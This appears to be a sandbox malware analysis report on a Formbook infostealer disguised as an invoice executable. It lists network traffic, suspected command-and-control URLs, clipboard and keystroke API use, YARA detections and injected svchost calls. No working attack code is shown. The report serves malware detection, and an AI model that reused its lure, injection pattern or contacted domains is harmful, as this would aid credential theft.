            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 26 Sep 2024 13:18:50 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fvXf1Ibbk2%2FSjDLsBCIrQsZs4%2F%2BpnN6RSvRBR9C%2FDxphf3fXhpBthxY04XnZSt59APcJWiqo1WKP7wOX%2Fko221G1TtaPeLo5hVZAEjh04zv49tvZmiAk6nI1VKiW4ypdS2NfQEz4Hg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c938acdf80c41e9-EWRData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 31 30 Data Ascii: error code: 1010
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:20:51 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:20:54 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:20:57 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:20:59 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound">
            Source: TapiUnattend.exe, 00000006.00000002.4160033591.0000000004B94000.00000004.10000000.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000003EF4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://newdaydawning.net/72tr/?wrRLLPUh=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6
            Source: tStjsTMXwkdtbv.exe, 00000007.00000002.4161197958.000000000532C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.turbonotes.app
            Source: tStjsTMXwkdtbv.exe, 00000007.00000002.4161197958.000000000532C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.turbonotes.app/yvck/
            Source: TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: TapiUnattend.exe, 00000006.00000002.4160033591.0000000004870000.00000004.10000000.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000003BD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
            Source: TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: TapiUnattend.exe, 00000006.00000002.4160033591.0000000004A02000.00000004.10000000.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000003D62000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: TapiUnattend.exe, 00000006.00000002.4158630244.0000000002F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: TapiUnattend.exe, 00000006.00000002.4158630244.0000000002F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: TapiUnattend.exe, 00000006.00000002.4158630244.0000000002F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: TapiUnattend.exe, 00000006.00000002.4158630244.0000000002F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033j
            Source: TapiUnattend.exe, 00000006.00000002.4158630244.0000000002F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: TapiUnattend.exe, 00000006.00000002.4158630244.0000000002F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: TapiUnattend.exe, 00000006.00000003.2344773956.0000000007D3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: TapiUnattend.exe, 00000006.00000002.4160033591.0000000004870000.00000004.10000000.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000003BD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech
            Source: TapiUnattend.exe, 00000006.00000002.4160033591.0000000004870000.00000004.10000000.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000003BD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4158565810.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4159371435.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2145065547.0000000008C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2140144317.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4158281170.0000000002C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2139429646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4159290006.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4161197958.00000000052B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4158565810.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4159371435.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2145065547.0000000008C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2140144317.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4158281170.0000000002C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2139429646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4159290006.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4161197958.00000000052B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C683 NtClose,1_2_0042C683
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B60 NtClose,LdrInitializeThunk,1_2_03272B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03272DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03272C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032735C0 NtCreateMutant,LdrInitializeThunk,1_2_032735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274340 NtSetContextThread,1_2_03274340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274650 NtSuspendThread,1_2_03274650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BA0 NtEnumerateValueKey,1_2_03272BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B80 NtQueryInformationFile,1_2_03272B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BE0 NtQueryValueKey,1_2_03272BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BF0 NtAllocateVirtualMemory,1_2_03272BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AB0 NtWaitForSingleObject,1_2_03272AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AF0 NtWriteFile,1_2_03272AF0
